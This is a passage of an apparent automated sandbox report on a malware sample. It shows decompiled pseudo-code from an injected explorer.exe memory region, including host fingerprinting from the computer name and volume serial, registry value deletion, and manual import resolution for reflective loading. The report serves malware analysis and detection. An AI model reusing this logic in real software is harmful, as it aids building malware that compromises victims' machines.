							E0008BC7A( &_v20, _t38); // executed
							_t18 = E000898EE(E000832A1, 0, __eflags, 0, 0); // executed
							__eflags = _t18;
							if(_t18 != 0) {
								goto L12;
							}
							_t22 =  *0x9e684; // 0x34f8f0
							 *((intOrPtr*)(_t22 + 0x30))( *0x9e674);
							_push(0xfffffffd);
							goto L11;
						} else {
							 *0x9e674 = 0;
							_push(0xfffffffe);
							L11:
							_pop(0);
							L12:
							E0008861A( &_v8, 0xffffffff);
							return 0;
						}
					}
					_push(0xfffffff5);
					goto L11;
				}
				return _t10 | 0xffffffff;
			}

0x000831c2
0x000831c8
0x000831d8
0x000831dd
0x000831df
0x000831e4
0x000831f5
0x000831fa
0x00083200
0x00083202
0x0008320b
0x00083210
0x00083213
0x00083215
0x00083217
0x00083219
0x0008321a
0x0008321a
0x00083227
0x0008322a
0x0008322f
0x00083249
0x0008324f
0x00083254
0x00083257
0x00083263
0x00083271
0x00083278
0x0008327a
0x00000000
0x00000000
0x0008327c
0x00083287
0x0008328a
0x00000000
0x00083259
0x00083259
0x0008325f
0x0008328c
0x0008328c
0x0008328d
0x00083293
0x00000000
0x0008329c
0x00083257
0x00083204
0x00000000
0x00083204
0x00000000

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8e4c99b3068590da576ac944090c7757318e2abd6f1916c3762a3faa55aaa0e
Instruction ID: 8572b94192bc1e43ddf863f0276067eeaee28e73aa111561e36aea24d5a940c8
Opcode Fuzzy Hash: b8e4c99b3068590da576ac944090c7757318e2abd6f1916c3762a3faa55aaa0e
Instruction Fuzzy Hash: 6821C872604211AAEB10FBB9EC45FAE77A8FB95B74F20032AF165D71D1EE3489008751

Uniqueness

Uniqueness Score: -1.00%

Function 00085A61, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00085A61(void* __eflags) {
				intOrPtr _t2;
				void* _t6;
				void* _t7;

				_t2 =  *0x9e684; // 0x34f8f0
				 *((intOrPtr*)(_t2 + 0x108))(1, E00085A06);
				E00085631(_t6, _t7); // executed
				return 0;
			}

0x00085a61
0x00085a6d
0x00085a73
0x00085a7a

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,00085A06,00085CE8), ref: 00085A6D

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
Instruction ID: 435aaf7462d5f916828f25a0b113b0bfc22426b62e8c3a1df64e723560edf676
Opcode Fuzzy Hash: bf483f35d551d8ef1a3c1b7981991285dfd450bd0acbef69aa8c4020bc965baf
Instruction Fuzzy Hash: 2FB092312509409BD640FB60CC8AEC83290BB20782F4100A072858A0A3DAE048906702

Uniqueness

Uniqueness Score: -1.00%

Function 00084A0B, Relevance: 9.3, APIs: 6, Instructions: 285
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E00084A0B(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
				char _v516;
				void _v1044;
				char _v1076;
				signed int _v1080;
				signed int _v1096;
				WCHAR* _v1100;
				intOrPtr _v1104;
				signed int _v1108;
				intOrPtr _v1112;
				intOrPtr _v1116;
				char _v1144;
				char _v1148;
				void* __esi;
				intOrPtr _t66;
				intOrPtr _t73;
				signed int _t75;
				intOrPtr _t76;
				signed int _t80;
				signed int _t81;
				WCHAR* _t87;
				void* _t89;
				signed int _t90;
				signed int _t91;
				signed int _t93;
				signed int _t94;
				WCHAR* _t96;
				intOrPtr _t106;
				intOrPtr _t107;
				void* _t108;
				intOrPtr _t109;
				signed char _t116;
				WCHAR* _t118;
				void* _t122;
				signed int _t123;
				intOrPtr _t125;
				void* _t128;
				void* _t129;
				WCHAR* _t130;
				void* _t134;
				void* _t141;
				void* _t143;
				WCHAR* _t145;
				signed int _t153;
				void* _t154;
				void* _t178;
				signed int _t180;
				void* _t181;
				void* _t183;
				void* _t187;
				signed int _t188;
				WCHAR* _t190;
				signed int _t191;
				signed int _t192;
				intOrPtr* _t194;
				signed int _t196;
				void* _t199;
				void* _t200;
				void* _t201;
				void* _t202;
				intOrPtr* _t203;
				void* _t208;

				_t208 = __fp0;
				_push(_t191);
				_t128 = __edx;
				_t187 = __ecx;
				_t192 = _t191 | 0xffffffff;
				memset( &_v1044, 0, 0x20c);
				_t199 = (_t196 & 0xfffffff8) - 0x454 + 0xc;
				_v1108 = 1;
				if(_t187 != 0) {
					_t123 =  *0x9e688; // 0xb0000
					_t125 =  *0x9e68c; // 0x34fab8
					_v1116 =  *((intOrPtr*)(_t125 + 0x68))(_t187,  *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x110)))));
				}
				if(E0008BB8D(_t187) != 0) {
					L4:
					_t134 = _t128; // executed
					_t66 = E0008B7A8(_t134,  &_v516); // executed
					_push(_t134);
					_v1104 = _t66;
					E0008B67D(_t66,  &_v1076, _t206, _t208);
					_t129 = E000849C7( &_v1076,  &_v1076, _t206);
					_t141 = E0008D400( &_v1076, E0008C379( &_v1076), 0);
					E0008B88A(_t141,  &_v1100, _t208);
					_t175 =  &_v1076;
					_t73 = E00082C8F(_t187,  &_v1076, _t206, _t208); // executed
					_v1112 = _t73;
					_t143 = _t141;
					if(_t73 != 0) {
						_push(0);
						_push(_t129);
						_push("\\");
						_t130 = E000892E5(_t73);
						_t200 = _t199 + 0x10;
						_t75 =  *0x9e688; // 0xb0000
						__eflags =  *((intOrPtr*)(_t75 + 0x214)) - 3;
						if( *((intOrPtr*)(_t75 + 0x214)) != 3) {
							L12:
							__eflags = _v1108;
							if(__eflags != 0) {
								_t76 = E000891E3(_v1112);
								_t145 = _t130;
								 *0x9e740 = _t76;
								 *0x9e738 = E000891E3(_t145);
								L17:
								_push(_t145);
								_t80 = E00089B43( &_v1044, _t187, _t208, _v1104,  &_v1080,  &_v1100); // executed
								_t188 = _t80;
								_t201 = _t200 + 0x10;
								__eflags = _t188;
								if(_t188 == 0) {
									goto L41;
								}
								_push(0x9b9ca);
								E00089F48(0xe); // executed
								E00089F6C(_t188, _t208, _t130); // executed
								_t194 = _a4;
								_v1096 = _v1096 & 0x00000000;
								_push(2);
								_v1100 =  *_t194;
								_push(8);
								_push( &_v1100);
								_t178 = 0xb; // executed
								E0008A0AB(_t188, _t178, _t208); // executed
								_t179 =  *(_t194 + 0x10);
								_t202 = _t201 + 0xc;
								__eflags =  *(_t194 + 0x10);
								if( *(_t194 + 0x10) != 0) {
									E0008A3ED(_t188, _t179, _t208);
								}
								_t180 =  *(_t194 + 0xc);
								__eflags = _t180;
								if(_t180 != 0) {
									E0008A3ED(_t188, _t180, _t208); // executed
								}
								_t87 = E0008980C(0);
								_push(2);
								_v1100 = _t87;
								_t153 = _t188;
								_push(8);
								_v1096 = _t180;
								_push( &_v1100);
								_t181 = 2; // executed
								_t89 = E0008A0AB(_t153, _t181, _t208); // executed
								_t203 = _t202 + 0xc;
								__eflags = _v1108;
								if(_v1108 == 0) {
									_t153 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t153 + 0xa4)) - 1;
									if(__eflags != 0) {
										_t90 = E0008FC1F(_t89, _t181, _t208, 0, _t130, 0);
										_t203 = _t203 + 0xc;
										goto L26;
									}
									_t153 = _t153 + 0x228;
									goto L25;
								} else {
									_t91 =  *0x9e688; // 0xb0000
									__eflags =  *((intOrPtr*)(_t91 + 0xa4)) - 1;
									if(__eflags != 0) {
										L32:
										__eflags =  *(_t91 + 0x1898) & 0x00000082;
										if(( *(_t91 + 0x1898) & 0x00000082) != 0) {
											_t183 = 0x64;
											E0008E23E(_t183);
										}
										E000852C0( &_v1076, _t208);
										_t190 = _a8;
										_t154 = _t153;
										__eflags = _t190;
										if(_t190 != 0) {
											_t94 =  *0x9e688; // 0xb0000
											__eflags =  *((intOrPtr*)(_t94 + 0xa0)) - 1;
											if( *((intOrPtr*)(_t94 + 0xa0)) != 1) {
												lstrcpyW(_t190, _t130);
											} else {
												_t96 = E0008109A(_t154, 0x228);
												_v1100 = _t96;
												lstrcpyW(_t190, _t96);
												E000885D5( &_v1100);
												 *_t203 = "\"";
												lstrcatW(_t190, ??);
												lstrcatW(_t190, _t130);
												lstrcatW(_t190, "\"");
											}
										}
										_t93 = _a12;
										__eflags = _t93;
										if(_t93 != 0) {
											 *_t93 = _v1104;
										}
										_t192 = 0;
										__eflags = 0;
										goto L41;
									}
									_t51 = _t91 + 0x228; // 0xb0228
									_t153 = _t51;
									L25:
									_t90 = E0008553F(_t153, _t130, __eflags);
									L26:
									__eflags = _t90;
									if(_t90 >= 0) {
										_t91 =  *0x9e688; // 0xb0000
										goto L32;
									}
									_push(0xfffffffd);
									L6:
									_pop(_t192);
									goto L41;
								}
							}
							_t106 = E0008C292(_v1104, __eflags);
							_v1112 = _t106;
							_t107 =  *0x9e684; // 0x34f8f0
							_t108 =  *((intOrPtr*)(_t107 + 0xd0))(_t106, 0x80003, 6, 0xff, 0x400, 0x400, 0, 0);
							__eflags = _t108 - _t192;
							if(_t108 != _t192) {
								_t109 =  *0x9e684; // 0x34f8f0
								 *((intOrPtr*)(_t109 + 0x30))();
								E0008861A( &_v1148, _t192);
								_t145 = _t108;
								goto L17;
							}
							E0008861A( &_v1144, _t192);
							_t81 = 1;
							goto L42;
						}
						_t116 =  *(_t75 + 0x1898);
						__eflags = _t116 & 0x00000004;
						if((_t116 & 0x00000004) == 0) {
							__eflags = _t116;
							if(_t116 != 0) {
								goto L12;
							}
							L11:
							E0008E286(_v1112, _t175);
							goto L12;
						}
						_v1080 = _v1080 & 0x00000000;
						_t118 = E000895E1(_t143, 0x879);
						_v1100 = _t118;
						_t175 = _t118;
						E0008BFEC(0x80000002, _t118, _v1112, 4,  &_v1080, 4);
						E000885D5( &_v1100);
						_t200 = _t200 + 0x14;
						goto L11;
					}
					_push(0xfffffffe);
					goto L6;
				} else {
					_t122 = E00082BA4( &_v1044, _t192, 0x105); // executed
					_t206 = _t122;
					if(_t122 == 0) {
						L41:
						_t81 = _t192;
						L42:
						return _t81;
					}
					goto L4;
				}
			}

0x00084a0b
0x00084a18
0x00084a23
0x00084a28
0x00084a2a
0x00084a2d
0x00084a32
0x00084a35
0x00084a3f
0x00084a41
0x00084a4e
0x00084a57
0x00084a57
0x00084a64
0x00084a7f
0x00084a86
0x00084a88
0x00084a8d
0x00084a92
0x00084a98
0x00084aa7
0x00084ac6
0x00084ac8
0x00084ace
0x00084ad4
0x00084ad9
0x00084add
0x00084ae0
0x00084aea
0x00084aec
0x00084aed
0x00084af8
0x00084afa
0x00084afd
0x00084b02
0x00084b09
0x00084b5e
0x00084b5e
0x00084b63
0x00084bca
0x00084bcf
0x00084bd1
0x00084bdb
0x00084be0
0x00084be0
0x00084bf5
0x00084bfa
0x00084bfc
0x00084bff
0x00084c01
0x00000000
0x00000000
0x00084c07
0x00084c11
0x00084c1a
0x00084c1f
0x00084c22
0x00084c28
0x00084c2e
0x00084c36
0x00084c38
0x00084c3b
0x00084c3c
0x00084c41
0x00084c44
0x00084c47
0x00084c49
0x00084c4d
0x00084c4d
0x00084c52
0x00084c55
0x00084c57
0x00084c5b
0x00084c5b
0x00084c62
0x00084c67
0x00084c69
0x00084c6d
0x00084c6f
0x00084c75
0x00084c79
0x00084c7c
0x00084c7d
0x00084c82
0x00084c85
0x00084c8a
0x00084cb2
0x00084cb8
0x00084cbf
0x00084cce
0x00084cd3
0x00000000
0x00084cd3
0x00084cc1
0x00000000
0x00084c8c
0x00084c8c
0x00084c91
0x00084c98
0x00084cdd
0x00084cdd
0x00084ce4
0x00084ce8
0x00084ce9
0x00084ce9
0x00084cf3
0x00084cf8
0x00084cfb
0x00084cfc
0x00084cfe
0x00084d00
0x00084d05
0x00084d0c
0x00084d4f
0x00084d0e
0x00084d13
0x00084d1b
0x00084d1f
0x00084d2a
0x00084d35
0x00084d3d
0x00084d41
0x00084d49
0x00084d49
0x00084d0c
0x00084d55
0x00084d58
0x00084d5a
0x00084d60
0x00084d60
0x00084d62
0x00084d62
0x00000000
0x00084d62
0x00084c9a
0x00084c9a
0x00084ca0
0x00084ca2
0x00084ca7
0x00084ca7
0x00084ca9
0x00084cd8
0x00000000
0x00084cd8
0x00084cab
0x00084ae4
0x00084ae4
0x00000000
0x00084ae4
0x00084c8a
0x00084b69
0x00084b77
0x00084b8a
0x00084b8f
0x00084b95
0x00084b97
0x00084baf
0x00084bb4
0x00084bbd
0x00084bc3
0x00000000
0x00084bc3
0x00084b9f
0x00084ba8
0x00000000
0x00084ba8
0x00084b0b
0x00084b11
0x00084b13
0x00084b51
0x00084b53
0x00000000
0x00000000
0x00084b55
0x00084b59
0x00000000
0x00084b59
0x00084b15
0x00084b1f
0x00084b2b
0x00084b36
0x00084b3d
0x00084b47
0x00084b4c
0x00000000
0x00084b4c
0x00084ae2
0x00000000
0x00084a66
0x00084a71
0x00084a77
0x00084a79
0x00084d64
0x00084d64
0x00084d66
0x00084d6c
0x00084d6c
0x00000000
0x00084a79

APIs

memset.MSVCRT ref: 00084A2D
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D1F
lstrcatW.KERNEL32 ref: 00084D3D
lstrcatW.KERNEL32 ref: 00084D41
lstrcatW.KERNEL32 ref: 00084D49
lstrcpyW.KERNEL32(00000000,00000000), ref: 00084D4F

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$memset
String ID:
API String ID: 1985475764-0
Opcode ID: a5dc98278c51056b20f5ad4c48acfda892f66f4e91ce1b005a64c70370a8f86c
Instruction ID: dec47ca1d8cbe9d9e50b353cb195f6a6744e81453b5205875f33d8479ea457cb
Opcode Fuzzy Hash: a5dc98278c51056b20f5ad4c48acfda892f66f4e91ce1b005a64c70370a8f86c
Instruction Fuzzy Hash: FC919E71604302AFE754FB24DC86FBA73E9BB84720F14452EF5958B292EB74DD048B92

Uniqueness

Uniqueness Score: -1.00%

Function 0008B7A8, Relevance: 9.1, APIs: 6, Instructions: 83
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0008B7A8(WCHAR* __ecx, void* __edx) {
				long _v8;
				long _v12;
				WCHAR* _v16;
				short _v528;
				short _v1040;
				short _v1552;
				WCHAR* _t27;
				signed int _t29;
				void* _t33;
				long _t38;
				WCHAR* _t43;
				WCHAR* _t56;

				_t44 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t43 = __edx;
				_t56 = __ecx;
				memset(__edx, 0, 0x100);
				_v12 = 0x100;
				GetComputerNameW( &_v528,  &_v12);
				lstrcpynW(_t43,  &_v528, 0x100);
				_t27 = E000895E1(_t44, 0xa88);
				_v16 = _t27;
				_t29 = GetVolumeInformationW(_t27,  &_v1552, 0x100,  &_v8, 0, 0,  &_v1040, 0x100);
				asm("sbb eax, eax");
				_v8 = _v8 &  ~_t29;
				E000885D5( &_v16);
				_t33 = E0008C392(_t43);
				E00089640( &(_t43[E0008C392(_t43)]), 0x100 - _t33, L"%u", _v8);
				lstrcatW(_t43, _t56);
				_t38 = E0008C392(_t43);
				_v12 = _t38;
				CharUpperBuffW(_t43, _t38);
				return E0008D400(_t43, E0008C392(_t43) + _t40, 0);
			}

0x0008b7a8
0x0008b7b1
0x0008b7bd
0x0008b7c3
0x0008b7c5
0x0008b7cd
0x0008b7e0
0x0008b7ef
0x0008b7fa
0x0008b807
0x0008b821
0x0008b826
0x0008b828
0x0008b82f
0x0008b83f
0x0008b850
0x0008b85a
0x0008b862
0x0008b869
0x0008b86c
0x0008b889

APIs

memset.MSVCRT ref: 0008B7C5
GetComputerNameW.KERNEL32(?,?,74EC17D9,00000000,74EC11C0), ref: 0008B7E0
lstrcpynW.KERNEL32(?,?,00000100), ref: 0008B7EF
GetVolumeInformationW.KERNELBASE(00000000,?,00000100,00000000,00000000,00000000,?,00000100), ref: 0008B821

Part of subcall function 00089640: _vsnwprintf.MSVCRT ref: 0008965D

lstrcatW.KERNEL32 ref: 0008B85A
CharUpperBuffW.USER32(?,00000000), ref: 0008B86C

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: BuffCharComputerInformationNameUpperVolume_vsnwprintflstrcatlstrcpynmemset
String ID:
API String ID: 3410906232-0
Opcode ID: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
Instruction ID: 8115248732dee6e15747b0cfab76d271734f3ac179cb7c14a2a6e9e989f043a1
Opcode Fuzzy Hash: bc563f98a76ff39ef6b2d004b5433a24202d3bbaf09a1f5485630d8fc5a90238
Instruction Fuzzy Hash: F82156B2A00214BFE714BBA4DC4AFEE77BCFB85310F108566B505E6182EE755F088B60

Uniqueness

Uniqueness Score: -1.00%

Function 000861B4, Relevance: 7.6, APIs: 5, Instructions: 145
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E000861B4(void* __edx, void* __fp0, void* _a4, short* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				char _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v56;
				void _v576;
				void* _t53;
				intOrPtr _t72;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t82;
				signed int _t85;
				intOrPtr _t87;
				int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				void* _t100;
				void* _t108;

				_t108 = __fp0;
				_t96 = __edx;
				_t89 = 0;
				_v8 = 0;
				memset( &_v576, 0, 0x208);
				_v28 = 0x104;
				_v20 = 0x3fff;
				_v16 = 0;
				_t53 = E00088604(0x3fff); // executed
				_t98 = _t53;
				_t100 = _t99 + 0x10;
				_v32 = _t98;
				if(_t98 == 0) {
					L18:
					return 0;
				}
				_t97 = E00088604(0x800);
				_v36 = _t97;
				if(_t97 == 0) {
					goto L18;
				}
				if(RegOpenKeyExW(_a4, _a8, 0, 0x2001f,  &_v8) != 0) {
					L15:
					if(_v8 != 0) {
						RegCloseKey(_v8);
					}
					E0008861A( &_v32, 0x3fff); // executed
					E0008861A( &_v36, 0x800); // executed
					goto L18;
				}
				_push( &_v56);
				_push( &_v40);
				_push( &_v44);
				_push( &_v48);
				_push( &_v24);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push( &_v28);
				_push( &_v576);
				_t72 =  *0x9e68c; // 0x34fab8
				_push(_v8);
				if( *((intOrPtr*)(_t72 + 0xb0))() == 0) {
					__eflags = _v24;
					if(_v24 == 0) {
						goto L15;
					}
					_v12 = 0;
					do {
						memset(_t97, 0, 0x800);
						memset(_t98, 0, 0x3fff);
						_t100 = _t100 + 0x18;
						_v20 = 0x3fff;
						_v16 = 0x800;
						 *_t98 = 0;
						_t80 =  *0x9e68c; // 0x34fab8
						_t81 =  *((intOrPtr*)(_t80 + 0xc8))(_v8, _t89, _t98,  &_v20, 0, 0, _t97,  &_v16);
						__eflags = _t81;
						if(_t81 == 0) {
							_t82 =  *0x9e690; // 0x34fb90
							_t90 =  *((intOrPtr*)(_t82 + 4))(_t97, _a12);
							__eflags = _t90;
							if(_t90 != 0) {
								_t92 =  *0x9e68c; // 0x34fab8
								 *((intOrPtr*)(_t92 + 0xa8))(_v8, _t98);
								__eflags = _a16;
								if(_a16 != 0) {
									_t85 = E0008C392(_t90);
									__eflags =  *((short*)(_t90 + _t85 * 2 - 2)) - 0x22;
									if(__eflags == 0) {
										__eflags = 0;
										 *((short*)(_t90 + _t85 * 2 - 2)) = 0;
									}
									E0008B1B1(_t90, _t96, __eflags, _t108);
								}
							}
							_t89 = _v12;
						}
						_t89 = _t89 + 1;
						_v12 = _t89;
						__eflags = _t89 - _v24;
					} while (_t89 < _v24);
					goto L15;
				}
				_t87 =  *0x9e68c; // 0x34fab8
				 *((intOrPtr*)(_t87 + 0x1c))(_v8);
				goto L15;
			}

0x000861b4
0x000861b4
0x000861c0
0x000861cf
0x000861d2
0x000861dc
0x000861e4
0x000861e7
0x000861ea
0x000861ef
0x000861f1
0x000861f4
0x000861f9
0x00086365
0x00086369
0x00086369
0x00086209
0x0008620b
0x00086211
0x00000000
0x00000000
0x00086234
0x00086333
0x00086337
0x00086341
0x00086341
0x0008634d
0x0008635b
0x00000000
0x00086360
0x0008623d
0x00086241
0x00086245
0x00086249
0x0008624d
0x0008624e
0x0008624f
0x00086250
0x00086251
0x00086255
0x0008625c
0x0008625d
0x00086262
0x0008626d
0x00086282
0x00086284
0x00000000
0x00000000
0x0008628a
0x0008628d
0x00086295
0x000862a2
0x000862a7
0x000862aa
0x000862b3
0x000862ba
0x000862ca
0x000862d4
0x000862da
0x000862dc
0x000862e1
0x000862ea
0x000862ec
0x000862ee
0x000862f0
0x000862fa
0x00086300
0x00086304
0x00086308
0x0008630d
0x00086313
0x00086315
0x00086317
0x00086317
0x0008631e
0x0008631e
0x00086304
0x00086323
0x00086323
0x00086326
0x00086327
0x0008632a
0x0008632a
0x00000000
0x0008628d
0x0008626f
0x00086277
0x00000000

APIs

memset.MSVCRT ref: 000861D2

Part of subcall function 00088604: RtlAllocateHeap.NTDLL(00000008,?,?,00088F84,00000100,?,00085FCB), ref: 00088612

RegOpenKeyExW.KERNEL32(?,?,00000000,0002001F,?,?,?,00000001), ref: 0008622C
memset.MSVCRT ref: 00086295
memset.MSVCRT ref: 000862A2
RegCloseKey.KERNEL32(00000000,?,?,00000001), ref: 00086341

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: memset$AllocateCloseHeapOpen
String ID:
API String ID: 1886988140-0
Opcode ID: 93ce28d5d0d56b15f8c62ba43f04e9097e84cfe134075291ab19f69f0add594f
Instruction ID: 5df326356aa9df0f49ed8f656d01e6deee27922878838a2d55d254d8868e0780
Opcode Fuzzy Hash: 93ce28d5d0d56b15f8c62ba43f04e9097e84cfe134075291ab19f69f0add594f
Instruction Fuzzy Hash: 6C5128B1A00209AFEB51EF94CC85FEE7BBCBF04340F118069F545A7252DB759E048B60

Uniqueness

Uniqueness Score: -1.00%

Function 0008CF84, Relevance: 7.5, APIs: 5, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0008CF84(void* __ecx) {
				intOrPtr _t11;
				long _t12;
				intOrPtr _t17;
				intOrPtr _t18;
				struct _OSVERSIONINFOA* _t29;

				_push(__ecx);
				_t29 =  *0x9e688; // 0xb0000
				GetCurrentProcess();
				_t11 = E0008BA05(); // executed
				_t1 = _t29 + 0x1644; // 0xb1644
				_t25 = _t1;
				 *((intOrPtr*)(_t29 + 0x110)) = _t11;
				_t12 = GetModuleFileNameW(0, _t1, 0x105);
				_t33 = _t12;
				if(_t12 != 0) {
					_t12 = E00088FBE(_t25, _t33);
				}
				_t3 = _t29 + 0x228; // 0xb0228
				 *(_t29 + 0x1854) = _t12;
				 *((intOrPtr*)(_t29 + 0x434)) = E00088FBE(_t3, _t33);
				memset(_t29, 0, 0x9c);
				_t29->dwOSVersionInfoSize = 0x9c;
				GetVersionExA(_t29);
				 *((intOrPtr*)(_t29 + 0x1640)) = GetCurrentProcessId();
				_t17 = E0008E3B6(_t3);
				_t7 = _t29 + 0x220; // 0xb0220
				 *((intOrPtr*)(_t29 + 0x21c)) = _t17;
				_t18 = E0008E3F1(_t7); // executed
				 *((intOrPtr*)(_t29 + 0x218)) = _t18;
				return _t18;
			}

0x0008cf87
0x0008cf89
0x0008cf90
0x0008cf98
0x0008cfa2
0x0008cfa2
0x0008cfa8
0x0008cfb1
0x0008cfb7
0x0008cfb9
0x0008cfbd
0x0008cfbd
0x0008cfc2
0x0008cfc8
0x0008cfd8
0x0008cfe2
0x0008cfea
0x0008cfed
0x0008cff9
0x0008cfff
0x0008d004
0x0008d00a
0x0008d010
0x0008d016
0x0008d01e

APIs

GetCurrentProcess.KERNEL32(?,?,000B0000,?,00083545), ref: 0008CF90
GetModuleFileNameW.KERNEL32(00000000,000B1644,00000105,?,?,000B0000,?,00083545), ref: 0008CFB1
memset.MSVCRT ref: 0008CFE2
GetVersionExA.KERNEL32(000B0000,000B0000,?,00083545), ref: 0008CFED
GetCurrentProcessId.KERNEL32(?,00083545), ref: 0008CFF3

Memory Dump Source

Source File: 00000007.00000002.888209871.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_80000_explorer.jbxd

Yara matches

Similarity

API ID: CurrentProcess$FileModuleNameVersionmemset
String ID:
API String ID: 3581039275-0
Opcode ID: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
Instruction ID: 1cd3ccc896d32ed381cc1e7efd68f96a46d511454c8c9de3dc1a9453bb6438f5
Opcode Fuzzy Hash: fb72102bbdb2b054f327c2bc50188617fdc42197deaff1c93ba3d83200c48df2
Instruction Fuzzy Hash: C4015E70901700ABE720BF70D84AADAB7E5FF85310F04082EF59683292EF746545CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0009249B, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 151
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 50%

			E0009249B(signed int __eax, intOrPtr _a4) {
				intOrPtr* _v8;
				signed int* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				struct HINSTANCE__* _v36;
				intOrPtr _v40;
				signed int _v44;
				struct HINSTANCE__* _v48;
				intOrPtr _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _t109;
				signed int _t112;
				signed int _t115;
				struct HINSTANCE__* _t121;
				void* _t163;

				_v44 = _v44 & 0x00000000;
				if(_a4 != 0) {
					_v48 = GetModuleHandleA("kernel32.dll");
					_v40 = E0008E099(_v48, "GetProcAddress");
					_v52 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
					_v32 = _v52;
					_t109 = 8;
					if( *((intOrPtr*)(_v32 + (_t109 << 0) + 0x78)) == 0) {
						L24:
						return 0;
					}
					_v56 = 0x80000000;
					_t112 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t112 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_v8 = _v8 + 0x14;
					}
					_t115 = 8;
					_v8 = _a4 +  *((intOrPtr*)(_v32 + (_t115 << 0) + 0x78));
					while( *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t121 = LoadLibraryA( *((intOrPtr*)(_v8 + 0xc)) + _a4); // executed
						_v36 = _t121;
						if(_v36 != 0) {
							if( *_v8 == 0) {
								_v12 =  *((intOrPtr*)(_v8 + 0x10)) + _a4;
							} else {
								_v12 =  *_v8 + _a4;
							}
							_v28 = _v28 & 0x00000000;
							while( *_v12 != 0) {
								_v24 = _v24 & 0x00000000;
								_v16 = _v16 & 0x00000000;
								_v64 = _v64 & 0x00000000;
								_v20 = _v20 & 0x00000000;
								if(( *_v12 & _v56) == 0) {
									_v60 =  *_v12 + _a4;
									_v20 = _v60 + 2;
									_v24 =  *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28);
									_v16 = _v40(_v36, _v20);
								} else {
									_v24 =  *_v12;
									_v20 = _v24 & 0x0000ffff;
									_v16 = _v40(_v36, _v20);
								}
								if(_v24 != _v16) {
									_v44 = _v44 + 1;
									if( *((intOrPtr*)(_v8 + 0x10)) == 0) {
										 *_v12 = _v16;
									} else {
										 *( *((intOrPtr*)(_v8 + 0x10)) + _a4 + _v28) = _v16;
									}
								}
								_v12 =  &(_v12[1]);
								_v28 = _v28 + 4;
							}
							_v8 = _v8 + 0x14;
							continue;
						}
						_t163 = 0xfffffffd;
						return _t163;
					}
					goto L24;
				}
				return __eax | 0xffffffff;
			}

0x000924a1
0x000924a9
0x000924be
0x000924d0
0x000924dc
0x000924e2
0x000924e7
0x000924f3
0x0009265e
0x00000000
0x0009265e
0x000924f9
0x00092502
0x00092510
0x00092513
0x00092522
0x00092522
0x00092529
0x00092537
0x0009253a
0x00092551
0x00092557
0x0009255e
0x0009256e
0x00092586
0x00092570
0x00092578
0x00092578
0x00092589
0x0009258d
0x00092599
0x0009259d
0x000925a1
0x000925a5
0x000925b1
0x000925dc
0x000925e4
0x000925f6
0x00092602
0x000925b3
0x000925b8
0x000925c3
0x000925cf
0x000925cf
0x0009260b
0x00092611
0x0009261b
0x00092637
0x0009261d
0x0009262c
0x0009262c
0x0009261b
0x0009263f
0x00092648
0x00092648
0x00092656
0x00000000
0x00092656
0x00092562
0x00000000
0x00092562
0x00000000
0x0009253a
0x00000000

APIs

